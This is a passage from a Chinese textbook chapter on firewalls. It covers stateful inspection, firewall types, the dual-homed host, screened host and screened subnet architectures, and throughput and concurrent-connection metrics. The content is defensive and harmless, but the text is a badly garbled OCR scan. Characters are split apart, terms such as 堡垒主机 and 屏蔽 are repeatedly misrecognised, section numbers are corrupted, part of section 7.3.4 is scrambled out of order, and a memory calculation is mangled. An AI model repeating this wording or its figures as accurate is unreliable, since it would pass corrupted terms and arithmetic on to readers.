状态 检测 检查 OSI 七 层 模型 的 所 有 层 ,以 决定 是 否 过 滤 , 而 不 仅仅 对 网 络 层 进行 检查 ,如 
图 7-8 所 示 。 
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图 7-8 状态 检测 防火 墙 


状态 检测 技术 首先 由 CheckPoint 公司 提出 并 实现 。 目 前 许多 包 过 滤 防 火 墙 中 都 使 用 
多 层 状态 检测 。 其 主要 特点 如 下 。 

(1) 安全 性 。 状 态 检测 防火 墙 工作 在 数据 链 路 层 和 网 络 层 之 间 ,截取 和 检查 所 有 通过 
网 络 的 原始 数据 包 并 进行 处 理 。 首 先 根据 安全 策略 从 数据 包 中 提取 有 用 信息 ,保存 在 内 存 
中 。 然 后 将 相关 信息 组 合 起 来 ,进行 一 些 逻 辑 或 数学 运算 并 进行 相应 的 操作 ,如 允许 或 拒绝 
数据 包 通 过 、 认 证 连接 和 加 密 数据 等 。 状 态 检测 防火 墙 虽然 工作 在 协议 栈 较 低 层 ,但 它 检测 
所 有 应 用 层 的 数据 包 并 从 中 提取 有 用 信息 ,如 IP 地 址 、 端 口号 和 数据 内 容 等 ,这 样 安全 性 就 
得 到 很 大 的 提高 。 

(2) 高 效 性 。 通 过 防火 墙 的 所 有 数据 包 都 在 低层 处 理 ,减少 了 高 层 协议 头 的 开销 ,执行 
效率 提高 很 多 。 另 外 ,在 这 种 防火 墙 中 ,一 旦 一 个 连接 建立 起 来 ,就 不 用 再 对 该 连接 做 更 多 
的 工作 。 例 如 ,一 个 通过 了 身份 验证 的 用 户 试图 打开 另 一 个 浏览 器 ,状态 检测 防火 墙 会 自动 
授予 该 计算 机 再 建立 其 他 会 话 的 权限 ,而 不 会 提示 该 用 户 再 输入 密码 。 

(3) 可 伸缩 性 和 易 扩展 性 。 状 态 检测 防火 墙 不 像 应 用 层 网 关 防 火 墙 ,每 个 应 用 对 应 一 
个 服务 程序 ,所 能 提供 的 服务 是 有 限 的 ,而 且 当 增加 一 个 新 的 服务 时 ,必须 为 新 的 服务 开发 
相应 的 服务 程序 。 状 态 检测 防火 墙 不 区 分 每 个 具体 的 应 用 ,只 是 根据 从 数据 包 中 提取 的 信 
息 、 对 应 的 安全 策略 及 过 滤 规 则 处 理 数据 包 。 当 有 一 个 新 的 应 用 时 , 它 能 动态 产生 并 应 用 新 
的 规则 ,而 不 用 另外 写 代 码 , 所 以 具有 很 好 的 伸缩 性 和 扩展 性 。 

(4) 应 用 范围 广 。 状 态 检测 防火 墙 不 仅 支持 基于 TCP 的 应 用 ,而 且 支 持 基于 无 连接 协 
议 的 应 用 ,如 RPCCremote procedure call), UDP 的 应 用 (DNS、WAIS 等 ) 。 对 于 无 连接 的 
协议 , 包 过 滤 防 火 墙 和 应 用 层 网 关 要 么 不 支持 这 类 应 用 ,要 么 开放 一 个 大 范围 的 UDP 端 
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口 ,这 样 会 暴露 内 部 网 ,降低 了 安全 性 。 

状态 检测 技术 更 适合 提供 对 UDP 的 支持 。 它 将 所 有 通过 防火 墙 的 UDP 分 组 均 视 为 
一 个 虚拟 连接 ,防火 墙 保存 通过 网 关 的 每 一 个 连接 的 状态 信息 ,人 允许 通过 防火 墙 的 UDP 请 
求 都 会 被 记录 。 当 UDP 包 在 相反 方向 上 通过 时 ,依据 连接 状态 表 确 定 该 UDP 包 是 否 被 授 
权 和 通过 。 每 个 虚拟 连接 都 具有 一 定 的 生存 期 , 较 长 时 间 没 有 数据 传送 的 连接 将 被 终止 。 


7.2.3 按 防火 墙 的 结构 分 类 


按 防 火 墙 的 结构 分 类 ,防火 墙 主要 有 单一 主机 防火 墙 . 路 由 器 集成 式 防火 墙 和 分 布 式 防 
火 墙 三 种 。 

(1) 单一 主机 防火 墙 是 最 为 传统 的 防火 墙 ,独立 于 其 他 网 络 设备 , 它 位 于 网 络 边界 。 这 
种 防火 墙 其 实 与 一 台 计 算 机 结构 差不多 ,同样 包括 CPU ,内 存 、 硬 盘 等 基本 组 件 ,当然 主 板 
更 是 不 能 缺少 , 且 主 板 上 也 有 南 ,北桥 芯 片 。 它 与 一 般 计算 机 最 主要 的 区 别 就 是 一 般 防 火 墙 
都 集成 了 两 个 以 上 的 以 太 网 卡 , 这 是 因为 它 需要 连接 一 个 以 上 的 内 、 外 部 网 络 。 其 中 的 硬盘 
就 是 用 来 存储 防火 墙 所 用 的 基本 程序 ,如 包 过 滤 程 序 和 代理 服务 器 程序 等 ,有 的 防火 墙 还 把 
日 志 记录 也 记录 在 此 硬盘 上 。 虽 然 如 此 ,但 还 不 能 说 它 就 与 平常 的 PC 一 样 ,因为 它 的 工作 
性 质 ,决定 了 它 要 具备 非常 高 的 稳定 性 ` 实 用 性 ,具备 非常 高 的 系统 吞吐 性 能 。 正 因 如 此 ,看 
似 与 PC 差不多 的 配置 ,价格 相差 甚 远 。 

随 着 防火 墙 技术 的 发 展 及 应 用 需求 的 提高 ,原来 作为 单一 主机 的 防火 墙 现 在 已 发 生 了 
许多 变化 。 最 明显 的 变化 就 是 现在 许多 中 \ 高 档 的 路 由 器 中 已 集成 了 防火 墙 功能 。 还 有 的 
防火 墙 已 不 再 是 一 个 独立 的 硬件 实体 ,而 是 由 多 个 软 、 硬 件 组 成 的 系统 ,这 种 防火 墙 ,俗称 
“分 布 式 防火 墙 ”。 

(2) 原来 单一 主机 的 防火 墙 由 于 价格 非常 昂贵 , 仅 有 少数 大 型 企业 才能 承受 得 起 ,为 了 
降低 企业 网 络 投资 ,现在 许多 中 ,高 档 路 由 器 中 集成 了 防火 墙 功能 ,如 Cisco IOS 防火 墙 系 
列 。 但 这 种 防火 墙 通常 是 较 低 级 的 包 过 滤 型 。 这 样 企业 就 不 用 再 同时 购买 路 由 器 和 防火 
墙 ,大 大 降低 了 网 络 设备 购买 成 本 。 

(3) 分 布 式 防火 墙 再 也 不 是 只 是 位 于 网 络 边界 ,而 是 渗透 于 网 络 的 每 一 台 主 机 ,对 整个 
内 部 网 络 的 主机 实施 保护 。 在 网 络 服务 器 中 ,通常 会 安装 一 个 用 于 防火 墙 的 系统 管理 软件 ， 
在 服务 器 及 各 主机 上 安装 有 集成 网 卡 功能 的 PCI 防火 墙 卡 , 这 样 一 块 防火 墙 卡 同时 兼 有 网 
卡 和 防火 墙 的 双重 功能 。 这 样 一 个 防火 墙 系统 就 可 以 彻底 保护 内 部 网 络 。 各 主机 把 任何 其 
他 主机 发 送 的 通信 连接 都 视 为 “不 可 信 ” 的 ,都 需 要 严格 过 滤 。 而 不 是 传统 边界 防火 墙 那样 ， 
仅 对 外 部 网 络 发 出 的 通信 请 求 “ 不 信任 ”。 


7.2.4 按 防火 墙 部 署 的 位 置 分 类 


如 果 按 防火 墙 部 署 的 位 置 分 类 ,可 以 分 为 边界 防火 墙 \ 个 人 防火 墙 和 混合 防火 墙 三 
大 类 。 

D 边界 防火 墙 是 最 为 传统 的 那 种 ,它们 位 于 内 、 外 部 网 络 的 边界 ,所 起 的 作用 是 对 内 、 
外 部 网 络 实施 隔离 ,保护 边界 内 部 网 络 。 这 类 防火 墙 一 般 都 是 硬件 类 型 的 ,价格 较 贵 , 性 能 
较 好 。 
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(2) 个 人 防火 墙 安装 于 单 台 主 机 中 ,防护 的 也 只 是 单 台 主 机 。 这 类 防火 墙 应 用 于 广大 
的 个 人 用 户 , 通 常 为 软件 防火 墙 ,价格 最 便宜 ,性 能 也 最 差 。 国 内 的 个 人 版 天 网 防火 墙 也 是 
一 款 优秀 的 软件 防火 墙 。 另 外 , 反 病 毒 软件 集成 的 防火 墙 也 是 典型 的 软件 防火 墙 。 

(3) 混合 防火 墙 可 以 说 就 是 "分 布 式 防火 墙 ? 或 " 庶 入 式 防火 墙 %, 它 是 一 整套 防火 墙 系 
统 , 由 若干 个 软 、 硬 件 组 成 ,分 布 于 内 、 外 部 网 络 边界 和 内 部 各 主机 之 间 , 既 对 内 、 外 部 网 络 之 
间 通 信 进 行 过 滤 , 又 对 网 络 内 部 各 主机 间 的 通信 进行 过 滤 。 它 属于 最 新 的 防火 墙 技术 之 一 ， 
性 能 最 好 ,价格 也 最 贵 。 


7.2.5 按 防火 墙 的 性 能 分 类 


如 果 按 防火 墙 的 性 能 来 分 可 以 分 为 百 兆 级 防火 墙 和 千 兆 级 防火 墙 两 类 。 

因为 防火 墙 通常 位 于 网 络 边界 ,所 以 不 可 能 只 是 十 兆 级 的 。 这 主要 是 指 防火 墙 的 通道 
带宽 (bandwidth) ,或 者 说 是 吞吐 率 。 当 然 信道 带宽 越 宽 , 性 能 越 高 ,这 样 的 防火 墙 因 包 过 滤 
或 应 用 代理 所 产生 的 延 时 也 越 小 ,对 整个 网 络 通信 性 能 的 影响 也 就 越 小 。 


0.8 防火 墙 系统 体系 结构 


7.3.1 常见 术语 
在 介绍 防火 墙 系统 体系 结构 之 前 , 先 对 防火 墙 体系 结构 中 常见 的 术语 进行 简要 说 明 。 
1. 堡垒 主机 


堡垒 主机 是 指 可 能 直接 面 对 外 部 用 户 攻击 的 主机 系统 ,在 防火 墙 体系 结构 中 , 特 指 那些 
处 于 内 部 网 络 的 边缘 ,并 且 暴露 于 外 部 网 络 用 户 面前 的 主机 系统 。 一 般 来 说 , 煲 又 主机 上 提 
供 的 服务 越 少 越 好 ,因为 每 增加 一 种 服务 就 增加 了 被 攻击 的 可 能 性 。 


2. 双重 宿主 主机 


双重 宿主 主机 是 指 至 少 拥有 两 个 以 上 网 络 接口 且 每 个 网 络 接口 连接 不 同 的 网 络 的 计算 
机 系统 ,因此 也 称 为 多 穴 主机 系统 。 一 般 来 说 ,双重 宿主 主机 是 实现 多 个 网 络 之 间 互 连 的 关 
键 设备 ,如 网 桥 是 在 数据 链 路 层 实现 互 连 的 双重 宿主 主机 ,路 由 器 是 在 网 络 层 实现 互 连 的 双 
重 宿 主 主机 ,应 用 层 网 关 是 在 应 用 层 实现 互 连 。 


3. 周边 网 络 


周边 网 络 是 指 在 内 部 网 络 .外 部 网 络 之 间 增加 的 一 个 网 络 ,一 般 来 说 ,对 外 提供 服务 的 
各 种 服务 器 都 可 以 放 在 这 个 网 络 里 。 周 边 网 络 也 被 称 为 非 军 事 区 ,或 中 立 区 (de militarized 
zone,DMZ)。 周 边 网 络 的 存在 ,使 得 外 部 用 户 访问 服务 器 时 不 需要 进入 内 部 网 络 ,而 内 部 
网 络 用 户 对 服务 器 维护 工作 导致 的 信息 传递 也 不 会 泄露 至 外 部 网 络 ; 同时 ,周边 网 络 与 外 
部 网 络 或 内 部 网 络 之 间 都 存在 着 数据 包 过 滤 ,这样 为 外 部 用 户 的 攻击 设置 了 多 重 障碍 ,确保 
了 内 部 网 络 的 安全 。 
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防火 墙 的 经 典 体系 结构 主要 有 双重 宿主 主机 体系 结构 、 被 屏蔽 主机 体系 结构 和 被 屏蔽 
子 网 体系 结构 三 种 形式 。 


7.3.2 双重 宿主 主机 体系 结构 


防火 墙 的 双重 宿主 主机 体系 结构 是 指 以 一 台 双 重 宿主 主机 作为 防火 墙 系统 的 主体 , 执 
行 分 离 外 部 网 络 与 内 部 网 络 的 任务 。 典 型 的 双重 宿主 主机 体系 结构 如 图 7-9 所 示 。 


图 7-9 双重 宿主 主机 体系 结构 


在 基于 双重 宿主 主机 体系 结构 的 防火 墙 中 , 带 有 内 部 网 络 和 外 部 网 络 接口 主机 系统 就 
构成 了 防火 墙 的 主体 ,该 台 双 重 宿主 主机 具备 了 成 为 内 部 网 络 和 外 部 网 络 之 间 路 由 器 的 条 
件 , 但 是 在 内 部 网 络 与 外 部 网 络 之 间 进 行 数 据 包 转发 的 进程 是 被 禁止 运行 的 。 为 了 达到 防 
火 墙 的 基本 效果 ,在 双重 宿主 主机 系统 中 ,任何 路 由 功能 是 禁止 的 ,甚至 前 面 介 绍 的 数据 包 
过 滤 技 术 也 是 不 允许 在 双重 宿主 主机 上 实现 的 。 双 重 宿主 主机 唯一 可 以 采用 的 防火 墙 技术 
就 是 应 用 层 代理 ,内 部 网 络 用 户 可 以 通过 客户 端 代理 软件 以 代理 方式 访问 外 部 网 络 资源 ,或 
者 直接 登录 至 双重 宿主 主机 成 为 一 个 用 户 , 再 利用 该 主机 直接 访问 外 部 资源 。 

双重 宿主 主机 体系 结构 防火 墙 的 优点 在 于 : 网 络 结构 比较 简单 ,由 于 内 、 外 网 络 之 间 没 
有 直接 的 数据 交互 而 较为 安全 ; 内 部 用 户 账号 的 存在 可 以 保证 对 外 部 资源 进行 有 效 控制 ; 
由 于 应 用 层 代理 机 制 的 采用 可 以 方便 地 形成 应 用 层 的 数据 与 信息 过 滤 。 其 缺点 在 于 : 用 户 
访问 外 部 资源 较为 复杂 ,如 果 用 户 需要 登录 到 主机 上 才能 访问 外 部 资源 , 则 主机 的 资源 消耗 
较 大 ; 用 户 机 制 存在 着 安全 隐患 ,并 且 内 部 用 户 无 法 借助 于 该 体系 结构 访问 新 的 服务 或 特 
殊 服 务 ; 一 旦 外 部 用 户 入 侵 了 双重 宿主 主机 , 则 导致 内 部 网 络 处 于 不 安全 状态 。 


7.3.3 ”被 屏蔽 主机 体系 结构 


被 屏蔽 主机 体系 结构 是 指 通过 一 个 单独 的 路 由 器 和 内 部 网 络 上 的 堡垒 主机 共同 构成 防 
火 墙 ,主要 通过 数据 包 过 滤 技 术 实现 内 、 外 网 络 的 隔离 和 对 内 网 的 保护 。 一 个 典型 的 被 屏蔽 
的 主机 体系 结构 如 图 7-10 所 示 。 

在 被 屏 项 主机 体系 结构 中 ,有 两 道 屏 障 : 一 道 是 屏蔽 路 由 器 ; 另 一 道 是 堡 艰 主机 。 屏 
项 路 由 器 位 于 网 络 的 最 边缘 ,负责 与 外 网 实施 连接 ,并 且 参 与 外 网 的 路 由 计算 。 屏 蔽 路 由 器 


图 7-10 被 屏蔽 主机 体系 结构 


不 提供 任何 服务 , 仅 提供 路 由 和 数据 包 过 滤 功 能 ,因此 屏蔽 路 由 器 本 身 较 为 安全 ,被 攻击 的 
可 能 性 较 小 。 由 于 屏蔽 路 由 器 的 存在 ,使 得 堡垒 主机 不 再 是 直接 与 外 网 互 连 的 双重 宿主 主 
机 ,增加 了 系统 的 安全 性 。 

堡垒 主机 存放 在 内 部 网 络 中 ,是 内 部 网 络 系统 中 唯一 可 以 连接 到 外 部 网 络 系统 的 主 
机 ,也 是 外 部 用 户 访问 内 部 网 络 资源 必须 经 过 的 主机 设备 。 在 经 典 的 被 屏蔽 主机 体系 结 
构 中 ,堡垒 主机 也 通过 数据 包 过 滤 功 能 实现 对 内 部 网 络 的 防护 ,并 且 该 堡垒 主机 仅仅 允 
许 通过 特定 的 服务 连接 。 保 又 主机 可 以 不 提供 数据 包 过 滤 功 能 ,而 提供 代理 功能 ,内 部 用 
户 只 能 通过 应 用 层 代理 访 问 外 部 网 络 ,而 堡垒 主机 就 成 为 外 部 用 户 唯 一 可 以 访问 的 内 部 


主机 。 


与 双重 宿主 主机 体系 结构 相 比 ,被 屏蔽 主机 体系 结构 的 优点 表现 在 以 下 几 个 方面 。 


比 双重 宿主 主机 体系 结构 具有 更 高 的 安全 特性 。 由 于 屏蔽 路 由 器 在 堡垒 主机 之 外 
提供 数据 包 过 滤 功 能 ,使 得 堡垒 主机 比 双重 宿主 主机 相对 安全 ,存在 漏洞 的 可 能 性 
较 小 ; 同时 ,堡垒 主机 的 数据 包 过 滤 功 能 限制 外 部 用 户 只 能 访问 特定 主机 上 的 特定 
服务 ,或 者 只 能 访问 堡垒 主机 上 的 特定 服务 ,在 提供 服务 的 同时 仍然 保证 了 内 部 网 
络 的 安全 。 

内 部 网 络 用 户 访问 外 部 网 络 较为 方便 ,灵活 ,在 屏蔽 路 由 器 和 保 垒 主机 允许 的 情况 
下 ,用 户 可 以 直接 访问 外 部 网 络 。 如 果 屏 蔽 路 由 器 和 堡垒 主机 不 允许 内 部 用 户 直 接 
访问 外 部 网 络 , 则 用 户 通 过 堡垒 主机 提供 的 代理 服务 访问 外 部 资源 。 在 实际 应 用 
中 ,将 两 种 方式 综合 运用 ,访问 不 同 的 服务 采用 不 同 的 方式 。 例 如 ,内 部 用 户 访问 
WWW, 可 以 采用 保 艰 主机 的 应 用 层 代 理 , 一 些 新 的 服务 可 以 直接 访问 。 

由 于 堡 艰 主机 和 屏蔽 路 由 器 的 同时 存在 ,使 得 堡 令 主 机 可 以 从 部 分 安全 事务 中 解脱 
出 来 ,从 而 可 以 以 更 高 的 效率 提供 数据 包 过 滤 或 代理 服务 。 


与 双重 宿主 主机 体系 结构 相 比 ,被 屏蔽 主机 体系 结构 的 主要 缺点 在 于 以 下 几 点 。 


在 被 屏蔽 主机 体系 结构 中 ,外 部 用 户 在 被 允许 的 情况 下 可 以 访问 内 部 网 络 ,这 样 就 
存在 着 一 定 的 安全 隐患 。 
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* 与 双重 宿主 主机 体系 一 样 ,一旦 用 户 入 侵 堡 令 主机 ,就 会 导致 内 部 网 络 处 于 不 安全 状态 。 
。 路 由 器 和 堡 从 主机 的 过 滤 规 则 配置 较为 复杂 , 较 容 易 形 成 错误 和 漏洞 。 


7.3.4 被 屏蔽 子 网 体系 结构 


在 防火 墙 的 双重 宿主 主机 体系 结构 和 被 屏蔽 主机 体系 结构 中 ,主机 都 是 最 主要 的 安全 
缺陷 ,一 旦 主机 被 人 侵 , 则 整个 内 部 网 络 都 处 于 入侵 者 的 威胁 之 中 ,为 解决 这 种 安全 隐患 ,出 
现 了 被 屏蔽 子 网 体系 结构 。 


被 屏蔽 子 
即 周边 网 络 ， 


子 网 体系 结构 如 图 7-11 所 示 。 


外 部 路 由 器 Eg. 


网 体系 结构 将 防火 墙 的 概念 扩充 至 一 个 由 两 台 路 由 器 包围 起 来 的 特殊 网 络 ， 
且 将 容易 受到 攻击 的 堡垒 主机 都 置 于 这 个 周边 网 络 中 。 一 个 典型 的 被 屏蔽 
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图 7-11 被 屏蔽 子 网 体系 结构 


被 屏蔽 子 网 体系 结构 的 防火 墙 比较 复杂 ,主要 由 4 个 部 件 构成 ,分 别 为 
路 由 器 内 部 路 由 器 以 及 堡 牟 主 机 。 


1. 周边 网 络 


周边 网络 是 位 于 


周边 网 络 、 外 部 


F 非 安全 ,不 可 信 的 外 部 网 络 与 安全 、 可 信 的 内 部 网 络 之 间 的 一 个 附加 的 网 


络 。 周 边 网 络 与 外 部 网 络 、 周 边 网 络 与 内 部 网 络 之 间 都 是 通过 屏蔽 路 由 器 实现 逻辑 隔离 , 因 
此 ,外 部 用 户 必须 穿越 两 道 屏蔽 路 由 器 才能 访问 内 部 网 络 。 一 般 情况 下 ,外 部 用 户 不 能 访问 内 
部 网 络 , 仅 能 够 访问 周边 网 络 中 的 资源 ,由 于 内 部 用 户 间 通 信 的 数据 包 不 会 通过 屏 项 路 由 器 传 
递 至 周边 网 络 , 外 部 用 户 即 使 人 侵 了 周边 网 络 中 的 堡 参 主机 ,也 无 法 监听 到 内 部 网 络 的 信息 。 


2. 外 部 路 由 器 
外 部 路 内 器 的 主要 作用 在 于 保护 周边 网 络 和 内 部 网 络 , 是 屏蔽 子 网 体系 结构 的 第 一 道 


屏障 。 在 其 


上 设置 了 对 周边 网 络 和 内 部 网 络 进行 访问 的 过 滤 规 则 ,该 规则 主 


要 针对 外 网 用 
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户 。 例 如 ,限制 外 网 用 户 仅 能 访问 周边 网 络 而 不 能 访问 内 部 网 络 ,或 者 仅 能 访问 内 部 网 络 中 
的 部 分 主机 。 外 部 路 由 器 基本 上 对 周边 网 络 发 出 的 数据 包 不 进行 过 滤 , 因 为 周边 网 络 发 送 
的 数据 包 都 来 自 堡垒 主机 或 由 内 部 路 由 器 过 滤 后 的 内 部 主机 数据 包 。 外 部 路 由 器 应 当 复 制 
内 部 服务 器 上 的 规则 ,以 避免 内 部 路 由 器 失效 而 造成 负面 影响 。 


3. 内 部 路 由 器 


内 部 路 由 器 用 于 隔离 周边 网 络 和 内 部 网 络 ,是 屏蔽 子 网 体系 结构 的 第 二 道 屏障 。 在 其 
上 设置 了 针对 内 部 用 户 的 访问 过 滤 规 则 ,对 内 部 用 户 访问 周边 网 络 和 外 部 网 络 进行 限制 。 
例如 ,部 分 内 部 网 络 用 户 只 能 访问 周边 网 络 而 不 能 访问 外 部 网 络 等 。 内 部 路 由 器 上 复制 了 
外 部 路 由 器 上 的 内 网 过 滤 规 则 ,以 防止 外 部 路 由 器 的 过 滤 功 能 失效 而 造成 的 严重 后 果 。 内 
部 路 由 器 还 要 限制 周边 网 络 的 堡垒 主机 和 内 部 网 络 之 间 的 访问 ,以 减少 在 堡垒 主机 被 和 人 侵 
后 可 以 影响 的 内 部 主机 数量 和 服务 的 数量 。 


4. 堡垒 主机 


在 被 屏蔽 子 网 结构 中 , 保 驮 主机 位 于 周边 网 络 , 可 以 向 外 部 用 户 提供 WWW、FTP 等 服 
务 ,接受 来 白 外 部 网 络 用 户 的 服务 资源 访问 请 求 ,同时 堡垒 主机 也 向 内 部 网 络 用 户 提 供 
DNS, WWW 代理 FTP 代理 等 服务 ,提供 内 部 网 络 用 户 访问 外 部 资源 的 接口 。 

与 双重 宿主 主机 体系 结构 和 被 屏蔽 主机 体系 结构 相 比 较 ,被 屏蔽 子 网 体系 结构 具有 明 
显 的 优越 性 ,这 些 优 越 性 体现 在 如 下 几 个 方面 。 
由 外 部 路 由 器 和 内 部 路 由 器 构成 了 双 层 防护 体系 ,入 侵 者 难以 突破 。 
外 部 用 户 访问 服务 资源 时 无 须 进 入 内 部 网 络 ,在 保证 服务 的 情况 下 提高 了 内 部 网 络 
的 安全 性 。 
外 部 路 由 器 和 内 部 路 由 器 上 的 过 滤 规 则 复制 避免 了 由 于 某 台 路 由 器 失效 产生 的 安 
全 隐患 。 
堡 参 主机 由 外 部 路 由 器 的 过 滤 规 则 和 本 机 安全 机 制 共 同 防护 ,用 户 只 能 访问 它 提 供 
的 服务 。 
即使 人 侵 者 通过 堡 估 主机 提供 服务 中 的 缺陷 控制 了 堡垒 主 机 ,由 于 内 部 路 由 器 将 内 
部 网 络 和 周边 网 络 隔离 ,入 侵 者 无 法 通过 监听 周边 网 络 获取 内 部 网 络 信息 。 

与 双重 宿主 主机 体系 结构 和 被 屏蔽 主机 体系 结构 相 比较 ,被 屏蔽 子 网 体系 结构 的 缺点 
主要 在 于 以 下 两 点 。 

。 构建 被 屏蔽 子 网 体系 结构 的 成 本 较 高 。 

。 被 屏蔽 子 网 体系 结构 的 配置 较为 复杂 ,容易 出 现 配置 错误 导致 的 安全 隐患 。 


0.4 防火 墙 技术 指标 


7.4.1 tS 


网 络 中 的 数据 是 由 一 个 个 数据 包 组 成 ,防火 墙 对 每 个 数据 包 的 处 理 要 耗费 资源 。 吞 吐 
量 是 指 在 没有 帧 丢失 的 情况 下 ,设备 能 够 接受 的 最 大 速率 。 
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吞吐 量 测试 方法 是 : 在 测试 中 以 一 定 速率 发 送 一 定数 量 的 帧 ,并 计算 待 测 设备 传输 的 
帧 ,如 果 发 送 的 帧 与 接收 的 帧 数量 相等 ,那么 就 将 发 送 速率 提高 并 重新 测试 如 果 接 收 帧 少 
于 发 送 帧 则 降低 发 送 速率 重新 测试 ,直至 得 出 最 终结 果 。 吞 吐 量 测试 结果 以 比特 / 秒 或 字 
节 / 秒 表示 。 
吞吐 量 和 报 文 转发 率 是 关系 防火 墙 应 用 的 主要 指标 ,一 般 用 FDT (full duplex 
throughput) 来 衡量 , 指 64B 数据 包 的 全 双 工 吞 吐 量 , 该 指标 既 包 括 吞 吐 量 指标 也 涵盖 了 报 
文 转发 率 指标 。 

随 着 Internet 的 日 益 普 及 ,内 部 网 用 户 访问 Internet 的 需求 在 不 断 增 加 ,一 些 企业 也 需 
要 对 外 提供 诸如 WWW 页 面 浏览 FTP 文件 传输 .DNS 域名 解析 等 服务 ,这 些 因素 会 导致 
网 络 流量 的 急剧 增加 ,而 防火 墙 作为 内 外 网 之 间 的 唯一 数据 通道 ,如 果 吞吐 量 太 小 ,就 会 成 
为 网 络 瓶 颈 ,给 整个 网 络 的 传输 效率 带 来 负面 影响 。 因 此 ,考察 防火 墙 的 吞吐 能 力 有 助 于 我 
们 更 好 地 评价 其 性 能 表现 。 这 也 是 测量 防火 墙 性 能 的 重要 指标 。 

吞吐 量 的 大 小 主要 由 防火 墙 内 网 卡 及 程序 算法 的 效率 决定 ,尤其 是 程序 算法 ,会 使 防火 
墙 系 统 进行 大 量 运 算 , 通 信和 量 大 打折 扣 。 因 此 ,大 多 数 防火 墙 虽 号 称 100Mbps 防火 墙 ,由 于 
其 算法 依靠 软件 实现 ,通信 量 远 远 没有 达到 100Mbps, 实 际 只 有 10~20Mbps。 纯 硬件 防火 
墙 , 由 于 采用 硬件 进行 运算 ,因此 吞吐 量 可 以 达到 线性 90 一 95Mbps, 是 真正 的 100Mbps 防 
火 墙 。 

对 于 中 小 型 企业 来 讲 , 选 择 吞 吐 量 为 百 兆 级 的 防火 墙 即 可 满足 需要 ,而 对 于 电信 、 金 融 、 
保险 等 大 公司 大 企业 部 门 就 需要 采用 吞吐 量 千 兆 级 的 防火 墙 产品 。 


7.4.2 并 发 连接 数 


并 发 连接 数 是 指 防火 墙 或 代理 服务 器 对 其 业务 信息 流 的 处 理 能 力 ,是 防火 墙 能 够 同时 
处 理 的 点 对 点 连接 的 最 大 数目 , 它 反映 出 防火 墙 设备 对 多 个 连接 的 访问 控制 能 力 和 连接 状 
态 跟踪 能 力 ,这 个 参数 的 大 小 直接 影响 到 防火 墙 所 能 支持 的 最 大 信息 点 数 ( 如 单 击 一 个 连接 
上 的 图 片 ,而 这 个 图 片 可 能 是 这 个 连接 从 另外 一 个 连接 上 连接 过 来 的 ,你 可 能 不 止 连接 了 一 
张 图 片 ,可 能 还 连接 了 很 多 数据 、 视 频 等 ,这 个 连接 可 能 非常 多 , 可 能 几 十 个 或 者 上 百 上 
T). 
并 发 连接 数 是 衡量 防火 墙 性 能 的 一 个 重要 指标 。 在 目前 市 面 上 常见 防火 墙 设备 的 说 明 
书 中 可 以 看 到 ,从 低 端 设备 的 500、1 000 个 并 发 连接 ,一 直到 高 端 设备 的 数 万 、 数 十 万 个 并 
发 连接 ,存在 着 好 几 个 数量 级 的 差异 。 那 么 ,并 发 连接 数 究竟 是 一 个 什么 概念 呢 ? 它 的 大 小 
会 对 用 户 的 日 常 使 用 产生 什么 影响 呢 ? 要 了 解 并 发 连接 数 , 首 先 需要 明白 一 个 概念 , 那 就 是 
“会 话 ”。 这 个 “会 话 ” 可 不 是 我 们 平时 的 谈话 ,但 是 可 以 用 平时 的 谈话 来 理解 ,两 个 人 在 谈话 
时 ,你 一 句 ,我 一 句 , 一 问 一 答 ,我 们 把 它 称 为 一 次 对 话 ,或 者 叫 会 话 。 同 样 ,我 们 用 计算 机 工 
作 时 ,打开 的 一 个 窗口 或 一 个 Web 页 面 ,可 以 把 它 叫 做 一 个 “会 话 ”, 扩 展 到 一 个 局 域 网 中 ， 
所 有 用 户 要 通过 防火 墙 上 网 ,要 打开 很 多 个 窗口 或 Web 页 面 ( 即 会 话 ) ,那么 ,这 个 防火 墙 ， 
所 能 处 理 的 最 大 会 话 数 量 ,就 是 “并 发 连接 数 ”。 

像 路 由 器 的 路 由 表 存 放 路 由 信息 一 样 ,防火 墙 中 也 有 一 个 这 样 的 表 , 我 们 把 它 叫做 并 发 
连接 表 , 用 以 存放 并 发 连接 信息 的 地 方 , 它 可 在 防火 墙 系统 启动 后 动态 分 配 进程 的 内 存 空 
间 , 其 大 小 也 就 是 防火 墙 所 能 支持 的 最 大 并 发 连接 数 。 大 的 并 发 连接 表 可 以 增 大 防火 墙 最 
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大 并 发 连接 数 , 允许 防火 墙 支持 更 多 的 客户 终端 。 尽 管 看 上 去 ,防火 墙 等 类 似 产 品 的 并 发 连 
接 数 越 大 越 好 。 但 是 与 此 同时 ,过 大 的 并 发 连接 表 也 会 带 来 一 定 的 负面 影响 。 

(1) 并 发 连接 数 的 增 大 意味 着 对 系统 内 存 资 源 的 消耗 。 以 每 个 并 发 连接 表 项 占用 
300B 计算 ,1000 个 并 发 连接 将 占用 300BX1000X8b/Bs*2.3MB 内 存 空间 ,10 000 个 并 发 
连接 将 占用 23MB 内 存 空 间 ,100 000 个 并 发 连接 将 占用 230MB 内 存 空间 ,而 如 果真 的 试图 
实现 1 000 000 个 并 发 连接 的 话 ,那么 ,这 个 产品 就 需要 提供 2. 24GB 内 存 空 间 ! 

(2) 并 发 连接 数 的 增 大 应 当 充 分 考虑 CPU 的 处 理 能 力 。CPU 的 主要 任务 是 把 网 络 上 
的 流量 从 一 个 网 段 尽 可 能 快速 地 转发 到 另 一 个 网 段 上 ,并且 在 转发 过 程 中 对 此 流量 按照 一 
定 的 访问 控制 策略 进行 许可 检查 .流量 统计 和 访问 审计 等 操作 ,这 都 要 求 防火 墙 对 并 发 连接 
表 中 的 相应 表 项 进行 不 断 的 更 新 读 写 操作 。 如 果 不 顾 CPU 的 实际 处 理 能 力 而 贸然 增 大 系 
统 的 并 发 连接 表 , 势 必 影 响 防火 墙 对 连接 请 求 的 处 理 延 迟 ,造成 某 些 连接 超时 ,让 更 多 的 连 
接 报 文 被 重 发 ,进而 导致 更 多 的 连接 超时 ,最 后 形成 雪 前 效应 ,致使 整个 防火 墙 系统 崩溃 。 

(3) 物理 链 路 的 实际 承载 能 力 严重 影响 防火 墙 发 挥 出 其 对 海量 并 发 连接 的 处 理 能 力 。 
虽然 目前 很 多 防火 墙 都 提供 了 10/100/1000Mbps 的 网 络 接口 ,但 是 ,由 于 防火 墙 通常 都 部 
署 在 Internet 出 口 处 ,在 客户 端 PC 与 目的 资源 中 间 的 路 径 上 ,总 是 存在 着 瓶颈 链 路 一 一 该 
瓶颈 链 路 可 能 是 2Mbps 专线 ,也 可 能 是 512kbps 乃至 64kbps 的 低速 链 路 。 这 些 拥挤 的 低 
